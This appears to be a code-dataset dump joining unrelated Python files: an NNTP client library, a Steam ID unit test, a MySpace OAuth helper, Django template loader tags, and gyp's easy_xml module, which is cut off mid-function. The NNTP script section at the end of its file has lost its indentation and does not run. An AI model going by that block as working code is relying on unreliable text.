class NNTPTemporaryError(NNTPError):
    """4xx errors (temporary failures)"""
    pass
class NNTPPermanentError(NNTPError):
    """5xx errors (permanent failures)"""
    pass
class NNTPProtocolError(NNTPError):
    """Response does not begin with [1-5]"""
    pass
class NNTPDataError(NNTPError):
    """Error in response data (malformed or over-long lines)"""
    pass
# for backwards compatibility
error_reply = NNTPReplyError
error_temp = NNTPTemporaryError
error_perm = NNTPPermanentError
error_proto = NNTPProtocolError
error_data = NNTPDataError
# Standard port used by NNTP servers
NNTP_PORT = 119
# Response numbers that are followed by additional text (e.g. article)
LONGRESP = ['100', '215', '220', '221', '222', '224', '230', '231', '282']
# Line terminators (we always output CRLF, but accept any of CRLF, CR, LF)
CRLF = '\r\n'
# The class itself
class NNTP:
    """A client connection to an NNTP server (RFC 977, plus common
    extensions such as XHDR/XOVER/XGTITLE/XPATH/DATE).

    All article numbers passed to and returned by this class are strings,
    not ints, since they are rarely used for calculations.
    """
    def __init__(self, host, port=NNTP_PORT, user=None, password=None,
                 readermode=None, usenetrc=True):
        """Initialize an instance.  Arguments:
        - host: hostname to connect to
        - port: port to connect to (default the standard NNTP port)
        - user: username to authenticate with
        - password: password to use with username
        - readermode: if true, send 'mode reader' command after
                      connecting.

        readermode is sometimes necessary if you are connecting to an
        NNTP server on the local machine and intend to call
        reader-specific commands, such as `group'.  If you get
        unexpected NNTPPermanentErrors, you might need to set
        readermode.
        """
        self.host = host
        self.port = port
        self.sock = socket.create_connection((host, port))
        self.file = self.sock.makefile('rb')
        self.debugging = 0
        self.welcome = self.getresp()
        # 'mode reader' is sometimes necessary to enable 'reader' mode.
        # However, the order in which 'mode reader' and 'authinfo' need to
        # arrive differs between some NNTP servers. Try to send
        # 'mode reader', and if it fails with an authorization failed
        # error, try again after sending authinfo.
        readermode_afterauth = 0
        if readermode:
            try:
                self.welcome = self.shortcmd('mode reader')
            except NNTPPermanentError:
                # error 500, probably 'not implemented'
                pass
            except NNTPTemporaryError, e:
                if user and e.response[:3] == '480':
                    # Need authorization before 'mode reader'
                    readermode_afterauth = 1
                else:
                    raise
        # If no login/password was specified, try to get them from ~/.netrc
        # Presume that if .netc has an entry, NNRP authentication is required.
        try:
            if usenetrc and not user:
                import netrc
                credentials = netrc.netrc()
                auth = credentials.authenticators(host)
                if auth:
                    user = auth[0]
                    password = auth[2]
        except IOError:
            # No .netrc (or unreadable): proceed unauthenticated.
            pass
        # Perform NNRP authentication if needed.
        if user:
            resp = self.shortcmd('authinfo user '+user)
            if resp[:3] == '381':
                # Server wants a password to complete authentication.
                if not password:
                    raise NNTPReplyError(resp)
                else:
                    resp = self.shortcmd(
                            'authinfo pass '+password)
                    if resp[:3] != '281':
                        raise NNTPPermanentError(resp)
            if readermode_afterauth:
                try:
                    self.welcome = self.shortcmd('mode reader')
                except NNTPPermanentError:
                    # error 500, probably 'not implemented'
                    pass
    # Get the welcome message from the server
    # (this is read and squirreled away by __init__()).
    # If the response code is 200, posting is allowed;
    # if it 201, posting is not allowed
    def getwelcome(self):
        """Get the welcome message from the server
        (this is read and squirreled away by __init__()).
        If the response code is 200, posting is allowed;
        if it 201, posting is not allowed."""
        if self.debugging: print '*welcome*', repr(self.welcome)
        return self.welcome
    def set_debuglevel(self, level):
        """Set the debugging level.  Argument 'level' means:
        0: no debugging output (default)
        1: print commands and responses but not body text etc.
        2: also print raw lines read and sent before stripping CR/LF"""
        self.debugging = level
    debug = set_debuglevel
    def putline(self, line):
        """Internal: send one line to the server, appending CRLF."""
        line = line + CRLF
        if self.debugging > 1: print '*put*', repr(line)
        self.sock.sendall(line)
    def putcmd(self, line):
        """Internal: send one command to the server (through putline())."""
        if self.debugging: print '*cmd*', repr(line)
        self.putline(line)
    def getline(self):
        """Internal: return one line from the server, stripping CRLF.
        Raise EOFError if the connection is closed."""
        # Read at most _MAXLINE + 1 bytes so an over-long line raises
        # NNTPDataError instead of consuming unbounded memory.
        line = self.file.readline(_MAXLINE + 1)
        if len(line) > _MAXLINE:
            raise NNTPDataError('line too long')
        if self.debugging > 1:
            print '*get*', repr(line)
        if not line: raise EOFError
        if line[-2:] == CRLF: line = line[:-2]
        elif line[-1:] in CRLF: line = line[:-1]
        return line
    def getresp(self):
        """Internal: get a response from the server.
        Raise various errors if the response indicates an error."""
        resp = self.getline()
        if self.debugging: print '*resp*', repr(resp)
        c = resp[:1]
        if c == '4':
            raise NNTPTemporaryError(resp)
        if c == '5':
            raise NNTPPermanentError(resp)
        if c not in '123':
            raise NNTPProtocolError(resp)
        return resp
    def getlongresp(self, file=None):
        """Internal: get a response plus following text from the server.
        Raise various errors if the response indicates an error."""
        openedFile = None
        try:
            # If a string was passed then open a file with that name
            if isinstance(file, str):
                openedFile = file = open(file, "w")
            resp = self.getresp()
            if resp[:3] not in LONGRESP:
                raise NNTPReplyError(resp)
            list = []
            while 1:
                line = self.getline()
                # A lone '.' terminates the multi-line response.
                if line == '.':
                    break
                # Undo NNTP dot-stuffing: leading '..' means a literal '.'.
                if line[:2] == '..':
                    line = line[1:]
                if file:
                    file.write(line + "\n")
                else:
                    list.append(line)
        finally:
            # If this method created the file, then it must close it
            if openedFile:
                openedFile.close()
        return resp, list
    def shortcmd(self, line):
        """Internal: send a command and get the response."""
        self.putcmd(line)
        return self.getresp()
    def longcmd(self, line, file=None):
        """Internal: send a command and get the response plus following text."""
        self.putcmd(line)
        return self.getlongresp(file)
    def newgroups(self, date, time, file=None):
        """Process a NEWGROUPS command.  Arguments:
        - date: string 'yymmdd' indicating the date
        - time: string 'hhmmss' indicating the time
        Return:
        - resp: server response if successful
        - list: list of newsgroup names"""
        return self.longcmd('NEWGROUPS ' + date + ' ' + time, file)
    def newnews(self, group, date, time, file=None):
        """Process a NEWNEWS command.  Arguments:
        - group: group name or '*'
        - date: string 'yymmdd' indicating the date
        - time: string 'hhmmss' indicating the time
        Return:
        - resp: server response if successful
        - list: list of message ids"""
        cmd = 'NEWNEWS ' + group + ' ' + date + ' ' + time
        return self.longcmd(cmd, file)
    def list(self, file=None):
        """Process a LIST command.  Return:
        - resp: server response if successful
        - list: list of (group, last, first, flag) (strings)"""
        resp, list = self.longcmd('LIST', file)
        for i in range(len(list)):
            # Parse lines into "group last first flag"
            list[i] = tuple(list[i].split())
        return resp, list
    def description(self, group):
        """Get a description for a single group.  If more than one
        group matches ('group' is a pattern), return the first.  If no
        group matches, return an empty string.

        This elides the response code from the server, since it can
        only be '215' or '285' (for xgtitle) anyway.  If the response
        code is needed, use the 'descriptions' method.

        NOTE: This neither checks for a wildcard in 'group' nor does
        it check whether the group actually exists."""
        resp, lines = self.descriptions(group)
        if len(lines) == 0:
            return ""
        else:
            return lines[0][1]
    def descriptions(self, group_pattern):
        """Get descriptions for a range of groups."""
        line_pat = re.compile("^(?P<group>[^ \t]+)[ \t]+(.*)$")
        # Try the more std (acc. to RFC2980) LIST NEWSGROUPS first
        resp, raw_lines = self.longcmd('LIST NEWSGROUPS ' + group_pattern)
        if resp[:3] != "215":
            # Now the deprecated XGTITLE.  This either raises an error
            # or succeeds with the same output structure as LIST
            # NEWSGROUPS.
            resp, raw_lines = self.longcmd('XGTITLE ' + group_pattern)
        lines = []
        for raw_line in raw_lines:
            match = line_pat.search(raw_line.strip())
            if match:
                lines.append(match.group(1, 2))
        return resp, lines
    def group(self, name):
        """Process a GROUP command.  Argument:
        - group: the group name
        Returns:
        - resp: server response if successful
        - count: number of articles (string)
        - first: first article number (string)
        - last: last article number (string)
        - name: the group name"""
        resp = self.shortcmd('GROUP ' + name)
        if resp[:3] != '211':
            raise NNTPReplyError(resp)
        words = resp.split()
        count = first = last = 0
        n = len(words)
        if n > 1:
            count = words[1]
            if n > 2:
                first = words[2]
                if n > 3:
                    last = words[3]
                    if n > 4:
                        name = words[4].lower()
        return resp, count, first, last, name
    def help(self, file=None):
        """Process a HELP command.  Returns:
        - resp: server response if successful
        - list: list of strings"""
        return self.longcmd('HELP',file)
    def statparse(self, resp):
        """Internal: parse the response of a STAT, NEXT or LAST command."""
        if resp[:2] != '22':
            raise NNTPReplyError(resp)
        words = resp.split()
        nr = 0
        id = ''
        n = len(words)
        if n > 1:
            nr = words[1]
            if n > 2:
                id = words[2]
        return resp, nr, id
    def statcmd(self, line):
        """Internal: process a STAT, NEXT or LAST command."""
        resp = self.shortcmd(line)
        return self.statparse(resp)
    def stat(self, id):
        """Process a STAT command.  Argument:
        - id: article number or message id
        Returns:
        - resp: server response if successful
        - nr:   the article number
        - id:   the message id"""
        return self.statcmd('STAT ' + id)
    def next(self):
        """Process a NEXT command.  No arguments.  Return as for STAT."""
        return self.statcmd('NEXT')
    def last(self):
        """Process a LAST command.  No arguments.  Return as for STAT."""
        return self.statcmd('LAST')
    def artcmd(self, line, file=None):
        """Internal: process a HEAD, BODY or ARTICLE command."""
        resp, list = self.longcmd(line, file)
        resp, nr, id = self.statparse(resp)
        return resp, nr, id, list
    def head(self, id):
        """Process a HEAD command.  Argument:
        - id: article number or message id
        Returns:
        - resp: server response if successful
        - nr: article number
        - id: message id
        - list: the lines of the article's header"""
        return self.artcmd('HEAD ' + id)
    def body(self, id, file=None):
        """Process a BODY command.  Argument:
        - id: article number or message id
        - file: Filename string or file object to store the article in
        Returns:
        - resp: server response if successful
        - nr: article number
        - id: message id
        - list: the lines of the article's body or an empty list
                if file was used"""
        return self.artcmd('BODY ' + id, file)
    def article(self, id):
        """Process an ARTICLE command.  Argument:
        - id: article number or message id
        Returns:
        - resp: server response if successful
        - nr: article number
        - id: message id
        - list: the lines of the article"""
        return self.artcmd('ARTICLE ' + id)
    def slave(self):
        """Process a SLAVE command.  Returns:
        - resp: server response if successful"""
        return self.shortcmd('SLAVE')
    def xhdr(self, hdr, str, file=None):
        """Process an XHDR command (optional server extension).  Arguments:
        - hdr: the header type (e.g. 'subject')
        - str: an article nr, a message id, or a range nr1-nr2
        Returns:
        - resp: server response if successful
        - list: list of (nr, value) strings"""
        pat = re.compile('^([0-9]+) ?(.*)\n?')
        resp, lines = self.longcmd('XHDR ' + hdr + ' ' + str, file)
        for i in range(len(lines)):
            line = lines[i]
            m = pat.match(line)
            if m:
                lines[i] = m.group(1, 2)
        return resp, lines
    def xover(self, start, end, file=None):
        """Process an XOVER command (optional server extension) Arguments:
        - start: start of range
        - end: end of range
        Returns:
        - resp: server response if successful
        - list: list of (art-nr, subject, poster, date,
                         id, references, size, lines)"""
        resp, lines = self.longcmd('XOVER ' + start + '-' + end, file)
        xover_lines = []
        for line in lines:
            # Overview lines are tab-separated; fewer than 8 fields is a
            # malformed response.
            elem = line.split("\t")
            try:
                xover_lines.append((elem[0],
                                    elem[1],
                                    elem[2],
                                    elem[3],
                                    elem[4],
                                    elem[5].split(),
                                    elem[6],
                                    elem[7]))
            except IndexError:
                raise NNTPDataError(line)
        return resp,xover_lines
    def xgtitle(self, group, file=None):
        """Process an XGTITLE command (optional server extension) Arguments:
        - group: group name wildcard (i.e. news.*)
        Returns:
        - resp: server response if successful
        - list: list of (name,title) strings"""
        line_pat = re.compile("^([^ \t]+)[ \t]+(.*)$")
        resp, raw_lines = self.longcmd('XGTITLE ' + group, file)
        lines = []
        for raw_line in raw_lines:
            match = line_pat.search(raw_line.strip())
            if match:
                lines.append(match.group(1, 2))
        return resp, lines
    def xpath(self,id):
        """Process an XPATH command (optional server extension) Arguments:
        - id: Message id of article
        Returns:
        resp: server response if successful
        path: directory path to article"""
        resp = self.shortcmd("XPATH " + id)
        if resp[:3] != '223':
            raise NNTPReplyError(resp)
        try:
            [resp_num, path] = resp.split()
        except ValueError:
            raise NNTPReplyError(resp)
        else:
            return resp, path
    def date (self):
        """Process the DATE command. Arguments:
        None
        Returns:
        resp: server response if successful
        date: Date suitable for newnews/newgroups commands etc.
        time: Time suitable for newnews/newgroups commands etc."""
        resp = self.shortcmd("DATE")
        if resp[:3] != '111':
            raise NNTPReplyError(resp)
        elem = resp.split()
        if len(elem) != 2:
            raise NNTPDataError(resp)
        # Response is '111 YYYYMMDDhhmmss'; split into date and time parts.
        date = elem[1][2:8]
        time = elem[1][-6:]
        if len(date) != 6 or len(time) != 6:
            raise NNTPDataError(resp)
        return resp, date, time
    def post(self, f):
        """Process a POST command.  Arguments:
        - f: file containing the article
        Returns:
        - resp: server response if successful"""
        resp = self.shortcmd('POST')
        # Raises error_??? if posting is not allowed
        if resp[0] != '3':
            raise NNTPReplyError(resp)
        while 1:
            line = f.readline()
            if not line:
                break
            if line[-1] == '\n':
                line = line[:-1]
            # Dot-stuff lines starting with '.' so they are not mistaken
            # for the end-of-article marker.
            if line[:1] == '.':
                line = '.' + line
            self.putline(line)
        self.putline('.')
        return self.getresp()
    def ihave(self, id, f):
        """Process an IHAVE command.  Arguments:
        - id: message-id of the article
        - f:  file containing the article
        Returns:
        - resp: server response if successful
        Note that if the server refuses the article an exception is raised."""
        resp = self.shortcmd('IHAVE ' + id)
        # Raises error_??? if the server already has it
        if resp[0] != '3':
            raise NNTPReplyError(resp)
        while 1:
            line = f.readline()
            if not line:
                break
            if line[-1] == '\n':
                line = line[:-1]
            # Dot-stuff lines starting with '.' (see post()).
            if line[:1] == '.':
                line = '.' + line
            self.putline(line)
        self.putline('.')
        return self.getresp()
    def quit(self):
        """Process a QUIT command and close the socket.  Returns:
        - resp: server response if successful"""
        resp = self.shortcmd('QUIT')
        self.file.close()
        self.sock.close()
        del self.file, self.sock
        return resp
# Test retrieval when run as a script.
# Assumption: if there's a local news server, it's called 'news'.
# Assumption: if user queries a remote news server, it's named
# in the environment variable NNTPSERVER (used by slrn and kin)
# and we want readermode off.
if __name__ == '__main__':
import os
newshost = 'news' and os.environ["NNTPSERVER"]
if newshost.find('.') == -1:
mode = 'readermode'
else:
mode = None
s = NNTP(newshost, readermode=mode)
resp, count, first, last, name = s.group('comp.lang.python')
print resp
print 'Group', name, 'has', count, 'articles, range', first, 'to', last
resp, subs = s.xhdr('subject', first + '-' + last)
print resp
for item in subs:
print "%7s %s" % item
resp = s.quit()
print resp
|
gpl-3.0
|
rwesterlund/pysteam
|
pysteam/tests/test_user.py
|
1
|
1232
|
#!/usr/bin/env python
# encoding: utf-8
"""
test_user.py
Created by Scott on 2013-12-29.
Copyright (c) 2013 Scott Rice. All rights reserved.
"""
import sys
import os
import mock
import shutil
import tempfile
import unittest
from pysteam import steam
from pysteam import user
class TestUser(unittest.TestCase):
    """Tests the Steam community-id conversion helpers in `user`."""
    # Known 32-bit / 64-bit community id pairs for two accounts, used as
    # fixtures for the conversion round-trip checks below.
    meris608_32 = 40586375
    meris608_64 = 76561198000852103
    jankenking_32 = 49642724
    jankenking_64 = 76561198009908452
    def test_community_id_is_64(self):
        # 64-bit ids are detected as such; 32-bit ids are not.
        self.assertFalse(user._community_id_is_64(self.meris608_32))
        self.assertTrue(user._community_id_is_64(self.meris608_64))
        self.assertFalse(user._community_id_is_64(self.jankenking_32))
        self.assertTrue(user._community_id_is_64(self.jankenking_64))
    def test_community_id_32_from_64(self):
        self.assertEqual(user._community_id_32_from_64(self.meris608_64), self.meris608_32)
        self.assertEqual(user._community_id_32_from_64(self.jankenking_64), self.jankenking_32)
    def test_community_id_64_from_32(self):
        self.assertEqual(user._community_id_64_from_32(self.meris608_32), self.meris608_64)
        self.assertEqual(user._community_id_64_from_32(self.jankenking_32), self.jankenking_64)
|
mit
|
dgouldin/django-socialite
|
socialite/apps/myspace/helper.py
|
1
|
1221
|
import oauth2 as oauth
import urlparse
from django.conf import settings
from django.contrib.auth.models import User
from django.core.cache import cache
from django.utils import simplejson
from socialite.apps.base.oauth import helper as oauth_helper
from socialite.apps.base.oauth20.utils import get_mutable_query_dict
from socialite.apps.myspace import models
api_url = 'http://api.myspace.com/v1/'
oauth_url = 'http://api.myspace.com/'
oauth_actions = {
oauth_helper.REQUEST_TOKEN: 'request_token',
oauth_helper.AUTHORIZE: 'authorize',
oauth_helper.AUTHENTICATE: 'authorize',
oauth_helper.ACCESS_TOKEN: 'access_token',
}
oauth_client = oauth_helper.Client(settings.MYSPACE_KEY, settings.MYSPACE_SECRET, oauth_url, oauth_actions,
signature_method=oauth.SignatureMethod_HMAC_SHA1())
def user_info(access_token):
    """Fetch the MySpace user record for `access_token`, caching it for
    five minutes keyed on the token."""
    CACHE_KEY = 'myspace:user_info:%s:' % access_token
    info = cache.get(CACHE_KEY)
    if info is None:
        url = urlparse.urljoin(api_url, 'user.json')
        info = simplejson.loads(oauth_client.request(url, access_token))
        cache.set(CACHE_KEY, info, 60 * 5) # 5 minutes
    return info
def get_unique_id(access_token):
    """Return the MySpace userId associated with `access_token`."""
    return user_info(access_token)['userId']
|
mit
|
htwenhe/DJOA
|
env/Lib/site-packages/django/template/loader_tags.py
|
115
|
12330
|
import logging
from collections import defaultdict
from django.utils import six
from django.utils.safestring import mark_safe
from .base import (
Node, Template, TemplateSyntaxError, TextNode, Variable, token_kwargs,
)
from .library import Library
register = Library()
BLOCK_CONTEXT_KEY = 'block_context'
logger = logging.getLogger('django.template')
class ExtendsError(Exception):
    """Raised when {% extends %} would recurse with non-recursive loaders."""
    pass
class BlockContext(object):
    """Tracks {% block %} overrides by name while an extends chain renders."""
    def __init__(self):
        # Dictionary of FIFO queues: each block name maps to the list of
        # BlockNodes that override it, oldest template's node last.
        self.blocks = defaultdict(list)
    def add_blocks(self, blocks):
        # Child templates are added first, so prepend to keep FIFO order.
        for block_name, node in six.iteritems(blocks):
            self.blocks[block_name].insert(0, node)
    def pop(self, name):
        """Remove and return the most specific block for `name`, or None."""
        queue = self.blocks[name]
        if not queue:
            return None
        return queue.pop()
    def push(self, name, block):
        self.blocks[name].append(block)
    def get_block(self, name):
        """Return the most specific block for `name` without removing it."""
        queue = self.blocks[name]
        return queue[-1] if queue else None
class BlockNode(Node):
    """Represents a {% block %} tag; renders the most specific override
    recorded in the render context's BlockContext."""
    def __init__(self, name, nodelist, parent=None):
        self.name, self.nodelist, self.parent = name, nodelist, parent
    def __repr__(self):
        return "<Block Node: %s. Contents: %r>" % (self.name, self.nodelist)
    def render(self, context):
        block_context = context.render_context.get(BLOCK_CONTEXT_KEY)
        with context.push():
            if block_context is None:
                # Not inside an extends chain: render our own contents.
                context['block'] = self
                result = self.nodelist.render(context)
            else:
                # Take the most specific override for this name; fall back
                # to ourselves if there is none.
                push = block = block_context.pop(self.name)
                if block is None:
                    block = self
                # Create new block so we can store context without thread-safety issues.
                block = type(self)(block.name, block.nodelist)
                block.context = context
                context['block'] = block
                result = block.nodelist.render(context)
                # Re-push the popped block so {{ block.super }} can find it.
                if push is not None:
                    block_context.push(self.name, push)
        return result
    def super(self):
        """Render the parent template's version of this block
        ({{ block.super }})."""
        if not hasattr(self, 'context'):
            raise TemplateSyntaxError(
                "'%s' object has no attribute 'context'. Did you use "
                "{{ block.super }} in a base template?" % self.__class__.__name__
            )
        render_context = self.context.render_context
        if (BLOCK_CONTEXT_KEY in render_context and
                render_context[BLOCK_CONTEXT_KEY].get_block(self.name) is not None):
            return mark_safe(self.render(self.context))
        return ''
class ExtendsNode(Node):
    """Represents an {% extends %} tag; renders the parent template with
    this template's blocks collected into the shared BlockContext."""
    # Enforced by the parser: {% extends %} must be the first tag.
    must_be_first = True
    context_key = 'extends_context'
    def __init__(self, nodelist, parent_name, template_dirs=None):
        self.nodelist = nodelist
        self.parent_name = parent_name
        self.template_dirs = template_dirs
        # Map block name -> BlockNode defined directly in this template.
        self.blocks = {n.name: n for n in nodelist.get_nodes_by_type(BlockNode)}
    def __repr__(self):
        return '<ExtendsNode: extends %s>' % self.parent_name.token
    def find_template(self, template_name, context):
        """
        This is a wrapper around engine.find_template(). A history is kept in
        the render_context attribute between successive extends calls and
        passed as the skip argument. This enables extends to work recursively
        without extending the same template twice.
        """
        # RemovedInDjango20Warning: If any non-recursive loaders are installed
        # do a direct template lookup. If the same template name appears twice,
        # raise an exception to avoid system recursion.
        for loader in context.template.engine.template_loaders:
            if not loader.supports_recursion:
                history = context.render_context.setdefault(
                    self.context_key, [context.template.origin.template_name],
                )
                if template_name in history:
                    raise ExtendsError(
                        "Cannot extend templates recursively when using "
                        "non-recursive template loaders",
                    )
                template = context.template.engine.get_template(template_name)
                history.append(template_name)
                return template
        history = context.render_context.setdefault(
            self.context_key, [context.template.origin],
        )
        template, origin = context.template.engine.find_template(
            template_name, skip=history,
        )
        history.append(origin)
        return template
    def get_parent(self, context):
        """Resolve and return the parent Template this node extends."""
        parent = self.parent_name.resolve(context)
        if not parent:
            error_msg = "Invalid template name in 'extends' tag: %r." % parent
            if self.parent_name.filters or\
                    isinstance(self.parent_name.var, Variable):
                error_msg += " Got this from the '%s' variable." %\
                    self.parent_name.token
            raise TemplateSyntaxError(error_msg)
        if isinstance(parent, Template):
            # parent is a django.template.Template
            return parent
        if isinstance(getattr(parent, 'template', None), Template):
            # parent is a django.template.backends.django.Template
            return parent.template
        return self.find_template(parent, context)
    def render(self, context):
        compiled_parent = self.get_parent(context)
        if BLOCK_CONTEXT_KEY not in context.render_context:
            context.render_context[BLOCK_CONTEXT_KEY] = BlockContext()
        block_context = context.render_context[BLOCK_CONTEXT_KEY]
        # Add the block nodes from this node to the block context
        block_context.add_blocks(self.blocks)
        # If this block's parent doesn't have an extends node it is the root,
        # and its block nodes also need to be added to the block context.
        for node in compiled_parent.nodelist:
            # The ExtendsNode has to be the first non-text node.
            if not isinstance(node, TextNode):
                if not isinstance(node, ExtendsNode):
                    blocks = {n.name: n for n in
                              compiled_parent.nodelist.get_nodes_by_type(BlockNode)}
                    block_context.add_blocks(blocks)
                break
        # Call Template._render explicitly so the parser context stays
        # the same.
        return compiled_parent._render(context)
class IncludeNode(Node):
    """Represents an {% include %} tag; renders another template inline."""
    context_key = '__include_context'
    def __init__(self, template, *args, **kwargs):
        self.template = template
        self.extra_context = kwargs.pop('extra_context', {})
        # True when 'only' was given: render with a fresh context.
        self.isolated_context = kwargs.pop('isolated_context', False)
        super(IncludeNode, self).__init__(*args, **kwargs)
    def render(self, context):
        """
        Render the specified template and context. Cache the template object
        in render_context to avoid reparsing and loading when used in a for
        loop.
        """
        try:
            template = self.template.resolve(context)
            # Does this quack like a Template?
            if not callable(getattr(template, 'render', None)):
                # If not, we'll try our cache, and get_template()
                template_name = template
                cache = context.render_context.setdefault(self.context_key, {})
                template = cache.get(template_name)
                if template is None:
                    template = context.template.engine.get_template(template_name)
                    cache[template_name] = template
            values = {
                name: var.resolve(context)
                for name, var in six.iteritems(self.extra_context)
            }
            if self.isolated_context:
                return template.render(context.new(values))
            with context.push(**values):
                return template.render(context)
        except Exception:
            # In debug mode propagate the error; otherwise log it and
            # render nothing so one broken include can't break the page.
            if context.template.engine.debug:
                raise
            template_name = getattr(context, 'template_name', None) or 'unknown'
            logger.warning(
                "Exception raised while rendering {%% include %%} for "
                "template '%s'. Empty string rendered instead.",
                template_name,
                exc_info=True,
            )
            return ''
@register.tag('block')
def do_block(parser, token):
    """
    Define a named block that child templates may override.
    """
    # Split on whitespace directly: this tag takes a literal name, never a
    # variable, so token.split_contents() buys nothing here.
    pieces = token.contents.split()
    if len(pieces) != 2:
        raise TemplateSyntaxError("'%s' tag takes only one argument" % pieces[0])
    tag_name, block_name = pieces
    # Remember every block name defined so far in this template so a
    # duplicate definition can be rejected with a clear message.
    existing = getattr(parser, '__loaded_blocks', None)
    if existing is None:
        parser.__loaded_blocks = [block_name]
    elif block_name in existing:
        raise TemplateSyntaxError("'%s' tag with name '%s' appears more than once" % (tag_name, block_name))
    else:
        existing.append(block_name)
    body = parser.parse(('endblock',))
    # Accept both "endblock" and "endblock <name>"; the named form is kept
    # for backwards-compatibility. See #3100.
    closing = parser.next_token()
    allowed = ('endblock', 'endblock %s' % block_name)
    if closing.contents not in allowed:
        parser.invalid_block_tag(closing, 'endblock', allowed)
    return BlockNode(block_name, body)
@register.tag('extends')
def do_extends(parser, token):
    """
    Signal that this template extends a parent template.
    Two call forms exist: ``{% extends "base" %}`` (quoted) names the parent
    template literally, while ``{% extends variable %}`` resolves ``variable``
    at render time to either a template name (a string) or a Template object.
    """
    args = token.split_contents()
    tag = args[0]
    if len(args) != 2:
        raise TemplateSyntaxError("'%s' takes one argument" % tag)
    parent_expr = parser.compile_filter(args[1])
    remainder = parser.parse()
    # Only a single {% extends %} may appear in any one template.
    if remainder.get_nodes_by_type(ExtendsNode):
        raise TemplateSyntaxError("'%s' cannot appear more than once in the same template" % tag)
    return ExtendsNode(remainder, parent_expr)
@register.tag('include')
def do_include(parser, token):
    """
    Load a template and render it with the current context.
    Extra context may be passed with ``with``; ``only`` restricts the
    included template to exactly that extra context::
        {% include "foo/some_include" %}
        {% include "foo/some_include" with bar="BAZZ!" baz="BING!" %}
        {% include "foo/some_include" only %}
        {% include "foo/some_include" with bar="1" only %}
    """
    bits = token.split_contents()
    if len(bits) < 2:
        raise TemplateSyntaxError(
            "%r tag takes at least one argument: the name of the template to "
            "be included." % bits[0]
        )
    seen = {}
    tail = bits[2:]
    while tail:
        opt = tail.pop(0)
        # Each option may be given at most once.
        if opt in seen:
            raise TemplateSyntaxError('The %r option was specified more '
                                      'than once.' % opt)
        if opt == 'with':
            extra = token_kwargs(tail, parser, support_legacy=False)
            if not extra:
                raise TemplateSyntaxError('"with" in %r tag needs at least '
                                          'one keyword argument.' % bits[0])
            seen[opt] = extra
        elif opt == 'only':
            seen[opt] = True
        else:
            raise TemplateSyntaxError('Unknown argument for %r tag: %r.' %
                                      (bits[0], opt))
    return IncludeNode(parser.compile_filter(bits[1]),
                       extra_context=seen.get('with', {}),
                       isolated_context=seen.get('only', False))
|
mit
|
jholloman/node-gyp
|
gyp/pylib/gyp/easy_xml.py
|
1049
|
4803
|
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import os
def XmlToString(content, encoding='utf-8', pretty=False):
  """ Converts the structured content into an XML string.
  Visual Studio files have a lot of pre-defined structures.  This function
  makes it easy to represent these structures as Python data structures,
  instead of having to create a lot of function calls.
  Each XML element of the content is represented as a list composed of:
  1. The name of the element, a string,
  2. The attributes of the element, a dictionary (optional), and
  3+. The content of the element, if any.  Strings are simple text nodes and
      lists are child elements.
  Example 1:
      <test/>
  becomes
      ['test']
  Example 2:
      <myelement a='value1' b='value2'>
         <childtype>This is</childtype>
         <childtype>it!</childtype>
      </myelement>
  becomes
      ['myelement', {'a':'value1', 'b':'value2'},
         ['childtype', 'This is'],
         ['childtype', 'it!'],
      ]
  Args:
    content: The structured content to be converted.
    encoding: The encoding to report on the first XML line.
    pretty: True if we want pretty printing with indents and new lines.
  Returns:
    The XML content as a string.
  """
  # We create a huge list of all the elements of the file.
  xml_parts = ['<?xml version="1.0" encoding="%s"?>' % encoding]
  if pretty:
    xml_parts.append('\n')
  _ConstructContentList(xml_parts, content, pretty)
  # Convert it to a string
  return ''.join(xml_parts)
def _ConstructContentList(xml_parts, specification, pretty, level=0):
  """ Appends the XML parts corresponding to the specification.

  Args:
    xml_parts: A list of XML parts to be appended to.
    specification: The specification of the element. See EasyXml docs.
    pretty: True if we want pretty printing with indents and new lines.
    level: Indentation level.
  """
  # The first item in a specification is the name of the element.
  if pretty:
    indentation = ' ' * level
    new_line = '\n'
  else:
    indentation = ''
    new_line = ''
  name = specification[0]
  if not isinstance(name, str):
    raise Exception('The first item of an EasyXml specification should be '
                    'a string. Specification was ' + str(specification))
  xml_parts.append(indentation + '<' + name)

  # Optionally in second position is a dictionary of the attributes.
  rest = specification[1:]
  if rest and isinstance(rest[0], dict):
    # .items() (not the Python-2-only .iteritems()) keeps this working on
    # both Python 2 and Python 3.
    for at, val in sorted(rest[0].items()):
      xml_parts.append(' %s="%s"' % (at, _XmlEscape(val, attr=True)))
    rest = rest[1:]
  if rest:
    xml_parts.append('>')
    # all() replaces the free function reduce(), which is not a builtin on
    # Python 3; the predicate is unchanged: every child is a plain string.
    all_strings = all(isinstance(y, str) for y in rest)
    multi_line = not all_strings
    if multi_line and new_line:
      xml_parts.append(new_line)
    for child_spec in rest:
      # If it's a string, append a text node.
      # Otherwise recurse over that child definition.
      if isinstance(child_spec, str):
        xml_parts.append(_XmlEscape(child_spec))
      else:
        _ConstructContentList(xml_parts, child_spec, pretty, level + 1)
    if multi_line and indentation:
      xml_parts.append(indentation)
    xml_parts.append('</%s>%s' % (name, new_line))
  else:
    xml_parts.append('/>%s' % new_line)
def WriteXmlIfChanged(content, path, encoding='utf-8', pretty=False,
                      win32=False):
  """ Writes the XML content to disk, touching the file only if it has changed.

  Args:
    content: The structured content to be written.
    path: Location of the file.
    encoding: The encoding to report on the first line of the XML file.
    pretty: True if we want pretty printing with indents and new lines.
    win32: True to convert line endings to CRLF when the host uses LF.
  """
  xml_string = XmlToString(content, encoding, pretty)
  if win32 and os.linesep != '\r\n':
    xml_string = xml_string.replace('\n', '\r\n')

  # Get the old content.  A missing or unreadable file just means the content
  # "has changed" and must be written; catch only I/O errors rather than a
  # bare except, which would also swallow KeyboardInterrupt/SystemExit.
  try:
    with open(path, 'r') as f:
      existing = f.read()
  except IOError:
    existing = None

  # It has changed, write it
  if existing != xml_string:
    with open(path, 'w') as f:
      f.write(xml_string)
# Mapping of characters to their XML character references.  (The entity
# strings had been decoded back to literal characters by a text-extraction
# pass, which made every entry an identity mapping and embedded raw
# newlines -- restoring the references makes escaping work again.)
_xml_escape_map = {
    '"': '&quot;',
    "'": '&apos;',
    '<': '&lt;',
    '>': '&gt;',
    '&': '&amp;',
    '\n': '&#xA;',
    '\r': '&#xD;',
}
# One alternation matching any single character that needs escaping.
_xml_escape_re = re.compile(
    "(%s)" % "|".join(map(re.escape, _xml_escape_map.keys())))
def _XmlEscape(value, attr=False):
  """ Escape a string for inclusion in XML."""
  def replace(match):
